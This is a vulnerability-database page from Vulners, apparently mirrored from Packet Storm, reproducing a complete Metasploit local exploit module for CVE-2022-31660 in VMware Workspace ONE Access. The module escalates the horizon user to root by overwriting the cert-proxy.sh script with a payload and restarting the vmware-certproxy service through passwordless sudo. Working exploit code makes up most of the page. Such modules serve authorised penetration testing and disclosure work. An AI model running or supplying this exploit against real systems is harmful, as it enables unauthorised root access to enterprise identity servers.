Lucene search
K

VMware Workspace ONE Access Privilege Escalation

🗓️ 04 Aug 2022 00:00:00Reported by Spencer McIntyre, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 500 Views

VMware Workspace ONE Access Privilege Escalation vulnerabilit

Related
Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Exploit::EXE  
include Msf::Post::File  
include Msf::Post::Unix  
  
TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze  
  
def initialize(info = {})  
super(  
update_info(  
info,  
{  
'Name' => 'VMware Workspace ONE Access CVE-2022-31660',  
'Description' => %q{  
VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges  
to those of the root user by modifying a file and then restarting the vmware-certproxy service which  
invokes it. The service control is permitted via the sudo configuration without a password.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Spencer McIntyre'  
],  
'Platform' => [ 'linux', 'unix' ],  
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],  
'SessionTypes' => ['shell', 'meterpreter'],  
'Targets' => [  
[ 'Automatic', {} ],  
],  
'DefaultOptions' => {  
'PrependFork' => true,  
'MeterpreterTryToFork' => true  
},  
'Privileged' => true,  
'DefaultTarget' => 0,  
'References' => [  
[ 'CVE', '2022-31660' ],  
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]  
],  
'DisclosureDate' => '2022-08-02',  
'Notes' => {  
# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service  
# is disabled by default though.  
'Stability' => [CRASH_SERVICE_DOWN],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK]  
}  
}  
)  
)  
end  
  
def certproxy_service  
# this script's location depends on the version, so find it.  
return @certproxy_service if @certproxy_service  
  
@certproxy_service = [  
'/usr/local/horizon/scripts/certproxyService.sh',  
'/opt/vmware/certproxy/bin/certproxyService.sh'  
].find { |path| file?(path) }  
  
vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service  
@certproxy_service  
end  
  
def sudo(arguments)  
cmd_exec("sudo --non-interactive #{arguments}")  
end  
  
def check  
unless whoami == 'horizon'  
return CheckCode::Safe('Not running as the horizon user.')  
end  
  
token = Rex::Text.rand_text_alpha(10)  
unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)  
return CheckCode::Safe('Cannot invoke the service control script with sudo.')  
end  
  
unless writable?(TARGET_FILE)  
return CheckCode::Safe('Cannot write to the service file.')  
end  
  
CheckCode::Appears  
end  
  
def exploit  
# backup the original permissions and contents  
print_status('Backing up the original file...')  
@backup = {  
stat: stat(TARGET_FILE),  
contents: read_file(TARGET_FILE)  
}  
  
if payload.arch.first == ARCH_CMD  
payload_data = "#!/bin/bash\n#{payload.encoded}"  
else  
payload_data = generate_payload_exe  
end  
upload_and_chmodx(TARGET_FILE, payload_data)  
print_status('Triggering the payload...')  
sudo("--background #{certproxy_service} restart")  
end  
  
def cleanup  
return unless @backup  
  
print_status('Restoring file contents...')  
file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it  
write_file(TARGET_FILE, @backup[:contents])  
print_status('Restoring file permissions...')  
chmod(TARGET_FILE, @backup[:stat].mode & 0o777)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Aug 2022 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.01062
500